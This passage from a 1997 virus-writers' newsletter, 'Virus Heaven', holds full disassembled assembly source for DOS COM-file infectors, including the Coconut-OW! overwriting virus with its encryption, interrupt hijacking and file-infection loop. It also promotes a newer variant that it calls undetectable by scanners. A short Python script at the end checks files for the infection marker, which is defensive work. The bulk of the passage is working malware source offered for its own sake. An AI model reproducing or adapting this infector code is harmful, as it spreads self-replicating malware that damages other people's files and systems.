segment POP DS STI RET RESTORE_BYTES: LEA SI,[BP+0845] ;[ORIGINAL_BYTES] MOV DI,0100 MOVSW MOVSW MOVSB RET PROC_2: MOV BYTE PTR DS:[BP+084F],00 RET PROC_3: MOV AH,47 ;get directory SUB DL,DL LEA SI,[BP+0853] ;(P_DIRECTORY +1) INT 3 MOV AH,1A ;set DTA adr. 
LEA DX,[BP+0893] ;(P_DIRECTORY +65d) INT 3 RET RESTORE_VECTOR: CLI PUSH DS XOR AX,AX MOV DS,AX MOV AX,CS:[BP+083C] ;[INT_3_OFFSET] MOV word ptr[offset start-00F4],AX ;=000Ch MOV AX,CS:[BP+083E] ;[INT_3_SEGMENT] MOV word ptr[offset start-00F2],AX ;=000Eh POP DS STI RET NEW_KEY: MOV AH,2C ;get time INT 3 CMP DX,+00 JZ NEW_KEY MOV DS:[BP+0850],DX ;[P_KEY] RET PROC_4: SUB CX,CX MOV CL,DS:[BP+08A8] LEA DX,[BP+08B1] MOV AX,4301 ;set attrib. INT 3 MOV CX,DS:[BP+08A9] MOV DX,DS:[BP+08ABh] MOV AX,5701 ;set file date/time INT 3 MOV AH,3E ;close file INT 3 RET PAYLOAD: SUB CX,CX MOV DX,314F MOV BX,0700 MOV AX,0600 ;CLS INT 10 MOV AH,05 ;activate screen page 0 INT 10 MOV AX,1112 ;8*8 SUB BL,BL INT 10 MOV AH,12 ;? MOV BL,20 INT 10 MOV AH,09 ;display String LEA DX,[BP+02EDh] ;(MESSAGE) INT 21 INT 20 ;exit RET ;------------------------------------------- DATA AUTHOR DB '[by @King Lizard]' MESSAGE DB 0Dh,0A, ' ooooo@@@@@@@@@@@@@ooooo' DB 0Dh,0A, ' oo@@@@@@@@@@@@@@@@@@@@@@@@@oo' DB 0Dh,0A, ' oo@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@oo' DB 0Dh,0A, ' o@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@o' DB 0Dh,0A, ' o@@@@@@@@@ @@@@@@@@@@@@@ @@@@@@@@@o' DB 0Dh,0A, ' o@@@@@@@@@ @@@@@@@@@@@ @@@@@@@@@@o' DB 0Dh,0A, ' @@@@@@@@@@@ @@@@@@@@@@@ @@@@@@@@@@@@' DB 0Dh,0A, ' @@@@@@@@@@@@@ @@@@@@@@@@@@@ @@@@@@@@@@@@@@' DB 0Dh,0A, '@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@' DB 0Dh,0A, '@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@' DB 0Dh,0A, '@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@' DB 0Dh,0A, ' @@@@ "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@" o@@@' DB 0Dh,0A, ' @@@o """@@@@@@@@@@@@@@@@@@@@@@""" o@@@' DB 0Dh,0A, ' @@@o "@@@"@@@@@@"@@@" o@@@' DB 0Dh,0A, ' @@@@o @ @ o@@@"' DB 0Dh,0A, ' "@@@@o o@@@@' DB 0Dh,0A, ' "@@@@@o @ @ o@@@@@"' DB 0Dh,0A, ' ""@@@@@o@@@oooooooo@@@o@@@@@""' DB 0Dh,0A, ' ""@@@@@@@@@@@@@@@@@@@@""' DB 0Dh,0A, ' ""@@@@@@@@@@@@@""' DB 0Dh,0A, '  ' DB 0Dh,0A, ' * *' DB 0Dh,0A, ' *** ***' DB 0Dh,0A, ' ***** Virus coconut wishes you a merry *****' DB 0Dh,0A, '******* christmas and a happy new year!! 
*******' DB 0Dh,0A, ' * *' DB 0Dh,0A, ' * *' DB 0Dh,0A,'$' ; COM_STRING DB '*.COM',0 ; ENCODE: CALL PROC_1 LAB_ENCODE_01: CMP WORD PTR DS:[BP+084Dh],+01 ;[P_COUNT] DEC WORD PTR DS:[BP+084Dh] ;[P_COUNT] JB LAB_08 LODSW ROR AX,CL XOR AX,CX ADD AX,CX STOSW JMP LAB_ENCODE_01 LAB_08: RET PROC_1: MOV WORD PTR DS:[BP+084Dh],02EC ;[P_COUNT] LEA SI,[BP+021Bh] ;(MOVE_POINTER) MOV CX,DS:[BP+0850] ;[P_KEY] MOV DI,SI RET DECODE: CALL PROC_1 LAB_DECODE_01: CMP WORD PTR DS:[BP+084Dh],+01 ;[P_COUNT] DEC WORD PTR DS:[BP+084Dh] ;[P_COUNT] JB LAB_09 LODSW SUB AX,CX XOR AX,CX ROL AX,CL STOSW JMP LAB_DECODE_01 LAB_09: RET ; INT_3_OFFSET DB 0F4,06 INT_3_SEGMENT DB 70,00 P_JUMP DB 0E9,7Dh,00 SIGNATURE DB 49,4E ORIGINAL_BYTES DB 90,90,90,90,90 PARENT_DIR DB '..',0 P_COUNT DB 0FF,0FF U_K DB 01 P_KEY DB 00,00 P_DIRECTORY DB '\' ;------------------ ; XXXX:08CE Directory Puffer ; XXXX:090E New_DTA_Adr ; ; 090E reserved ; 0923 attrib. ; 0924 time ; 0926 date ; 0928 file length (low) ; 092A file length (high) ; 092C file name ; And here is the Coconut-OW! virus; ; ------------------------------------------------------------- ; The COCONUT-OW! virus (Coconut.1323) ; (analysis by DooMSday) ; ============================================================= ; * direct action, overwriting com-file infector ; * activation date: August 31st ---> displays message ; * no date/time change ; * encrypted ; * tries to infect all files in the current directory ; * contains a bug (?) 
(see EOF) ; * virus author: The King Lizard ; ------------------------------------------------------------------------ .MODEL TINY .RADIX 16 .CODE ORG 100 START: CALL DECODE JMP short LAB_01 PROC_02: CALL NEW_KEY MOV DX,009E CALL ENCODE MOV AX,4300 ;read file attribute INT 01 MOV [ATTRIBUTE],CX XOR CX,CX MOV AX,4301 ;set file attribute INT 01 MOV AX,3D02 ;open file: read/write INT 01 JB PAYLOAD XCHG BX,AX MOV AX,5700 ;get file date/time INT 01 MOV [FILE_DATE],DX ;and save MOV [FILE_TIME],CX MOV DX,0100 MOV AH,40 ;write file MOV CX,052Bh INT 01 MOV AX,5701 ;set file date/time MOV CX,[FILE_TIME] MOV DX,[FILE_DATE] INT 01 MOV AH,3E ;close file INT 01 MOV DX,009E MOV CX,[ATTRIBUTE] MOV AX,4301 ;set file attribute INT 01 CALL DECODE RET LAB_01: CLI ;set Int 01h-vector PUSH DS ;to Int 21h-routine XOR AX,AX MOV DS,AX MOV AX,word ptr[offset start-0FC] ;[0004] MOV CS:[INT_01_OFFSET],AX MOV AX,word ptr[offset start-0FA] ;[0006] MOV CS:[INT_01_SEGMENT],AX MOV AX,word ptr[offset start-7C] ;[0084] MOV word ptr[offset start-0FC],AX ;[0004] MOV AX,word ptr[offset start-7A] ;[0086] MOV word ptr[offset start-0FA],AX ;[0006] POP DS STI MOV DX,01D9 ;offset (FILE) MOV AH,4E ;find first MOV CX,0007 INT 01 JNB LAB_02 JMP short PAYLOAD LAB_02: CALL PROC_02 MOV DX,0080 MOV AH,4F ;find next INT 01 JNB LAB_03 JMP short PAYLOAD LAB_03: JMP short LAB_02 PAYLOAD: MOV AH,2A ;get date INT 01 CMP DH,08 ;month=8 ? JNZ LAB_PAYLOAD_1 CMP DL,1F ;day=31 ? 
JNZ LAB_PAYLOAD_1 MOV AH,09 ;display string MOV DX,0202 ;offset (MESSAGE) INT 01 LAB_PAYLOAD_1: CLI PUSH DS XOR AX,AX MOV DS,AX MOV AX,CS:[INT_01_OFFSET] MOV word ptr[offset start-0FC],AX ;[0004] MOV AX,CS:[INT_01_SEGMENT] MOV word ptr[offset start-0FA],AX ;[0006] POP DS STI INT 20 ;exit to DOS NEW_KEY: MOV AH,2C ;get time INT 01 CMP DX,+00 JZ NEW_KEY MOV [KEY],DX RET ; FILE db '*.COM',0 INFO db '[Virus coconut, by The King Lizard]' ; MESSAGE DB 0Dh,0A,' ooooo@@@@@@@@@@@@@ooooo' DB 0Dh,0A,' oo@@@@@@@@@@@@@@@@@@@@@@@@@oo' DB 0Dh,0A,' oo@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@oo' DB 0Dh,0A,' o@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@o' DB 0Dh,0A,' o@@@@@@@@@ @@@@@@@@@@@@@ @@@@@@@@@o' DB 0Dh,0A,' o@@@@@@@@@ @@@@@@@@@@@ @@@@@@@@@@o' DB 0Dh,0A,' @@@@@@@@@@@ @@@@@@@@@@@ @@@@@@@@@@@@' DB 0Dh,0A,' @@@@@@@@@@@@@ @@@@@@@@@@@@@ @@@@@@@@@@@@@@' DB 0Dh,0A,'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@' DB 0Dh,0A,'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@' DB 0Dh,0A,'@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@' DB 0Dh,0A,'@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@' DB 0Dh,0A,' @@@@ "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@" o@@@' DB 0Dh,0A,' @@@o """@@@@@@@@@@@@@@@@@@@@@@""" o@@@' DB 0Dh,0A,' @@@o "@@@"@@@@@@"@@@" o@@@' DB 0Dh,0A,' @@@@o @ @ o@@@"' DB 0Dh,0A,' "@@@@o o@@@@' DB 0Dh,0A,' "@@@@@o o@@@@@"' DB 0Dh,0A,' ""@@@@@oooooooooooooooo@@@@@""' DB 0Dh,0A,' ""@@@@@@@@@@@@@@@@@@@@""' DB 0Dh,0A,' ""@@@@@@@@@@@@@""' DB 0Dh,0A,'$' ; DB 0,0 ;? 
COUNT dw 0 KEY dw 0 ; FILE_DATE dw 0 FILE_TIME dw 0 ATTRIBUTE dw 0 ; INT_01_OFFSET dw 0 INT_01_SEGMENT dw 0 ENCODE: CALL PROC_01 LAB_ENCODE_01: CMP WORD PTR [COUNT],+00 JZ LAB_ENCODE_02 LODSW ROR AX,CL XOR AX,CX ADD AX,CX STOSW DEC WORD PTR [COUNT] JMP short LAB_ENCODE_01 LAB_ENCODE_02: RET PROC_01: MOV WORD PTR [COUNT],023E MOV SI,015E MOV CX,[KEY] MOV DI,SI RET DECODE: CALL PROC_01 LAB_DECODE_1: CMP WORD PTR [COUNT],+00 JZ LAB_DECODE_2 LODSW SUB AX,CX XOR AX,CX ROL AX,CL STOSW DEC WORD PTR [COUNT] JMP short LAB_DECODE_1 LAB_DECODE_2: INT 3 ;BUG! (shouldn't it be "RET" ?) END START ----------------------------------------------

And for those who just cannot wait for more of the Coconut family, be sure to head on over to Virus Heaven for the newest addition to the family, the COCONUT-2099 virus. It is appending, non-resident with double encryption, a handler on int 24h, an anti-tracer, keyboard blocking, dot-dot search, and it hooks int 3h. It does not infect EXE files under 1K or files over 500K. It does not infect .COM files that have been renamed .EXE. It has an inoffensive payload and is currently (March 5, 1997) undetectable by commercial virus scanners.

=============================================================================

SECTION - 9
The End

Well, this brings another close to the Virus Heaven Newsletter. I expect that you guys will leave me alone for a week or two before hounding me about when issue #4 will be out. I will admit this one took a while to get out; hell, I have been working on it since before Christmas. But I have a few ideas for articles. I may even be doing some research on this next one, but that is all I will say for now. And of course, as always, if you write an article, send it in. I do have one request, though: please don't send me any more TROJAN handbooks and tutorials. This was it; I wanna at least keep this thing as focused as a passed-out drunkard on the curb.
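A triage check for the COCONUT-AP! infection marker that dooMSday's analysis above describes (the 3-byte JMP written over the host's first bytes, the "IN" word at 0103h, the size window and the '??MM????.COM' exclusion), written here as an added example; it is not code from the newsletter or from the virus author, and the sample byte strings are constructed, not real infected files.

```python
# Added example: triage check for the COCONUT-AP! markers described in the
# analysis above. Not code from the newsletter; sample inputs are constructed.

COM_LOAD_ADDR = 0x100          # .COM images are loaded at CS:0100h
SIGNATURE = b"IN"              # word 4E49h at 0103h, the virus's own reinfection test
SIGNATURE_OFFSET = 0x103 - COM_LOAD_ADDR   # file offset 3
JMP_NEAR = 0xE9                # the 3-byte JMP the infector writes over the first bytes
MIN_SIZE, MAX_SIZE = 128, 60000            # size window stated in the analysis header


def has_coconut_ap_marker(image: bytes) -> bool:
    """True if a COM image starts with E9 xx xx 'I' 'N', the layout the infector leaves."""
    if len(image) < SIGNATURE_OFFSET + len(SIGNATURE):
        return False
    return image[0] == JMP_NEAR and image[SIGNATURE_OFFSET:SIGNATURE_OFFSET + 2] == SIGNATURE


def is_in_infection_scope(filename: str, size: int) -> bool:
    """Mirror the listing's target filters: *.COM, size window, and the '??MM????.COM' skip."""
    name = filename.upper().rsplit("\\", 1)[-1]
    if not name.endswith(".COM"):
        return False
    if name[2:4] == "MM":          # CMP WORD PTR [BP+08B3],4D4Dh -> COMMAND.COM is skipped
        return False
    return MIN_SIZE <= size <= MAX_SIZE


def triage(filename: str, image: bytes) -> str:
    """Classify one file as 'marked', 'clean', or 'out-of-scope' (virus would never touch it)."""
    if has_coconut_ap_marker(image):
        return "marked"
    if not is_in_infection_scope(filename, len(image)):
        return "out-of-scope"
    return "clean"


# Constructed samples (not real files): a NOP-padded host ending in INT 20h, and the
# same host after the 5-byte header the infector writes (E9 7D 00 'I' 'N') with a
# dummy appended body of 074Eh bytes, the length the listing writes at end of file.
HOST = b"\x90" * 0x200 + b"\xCD\x20"
MARKED = b"\xE9\x7D\x00IN" + HOST[5:] + b"\x00" * 0x74E

if __name__ == "__main__":
    samples = (("HELLO.COM", HOST), ("HELLO.COM", MARKED),
               ("COMMAND.COM", MARKED), ("TINY.COM", b"\xCD\x20"))
    for name, data in samples:
        print(f"{name:12s} {len(data):6d} bytes -> {triage(name, data)}")
```

The "IN" word is the same test the virus uses to avoid reinfecting a file, so a match is a triage hit to confirm by inspecting the appended body, not proof on its own.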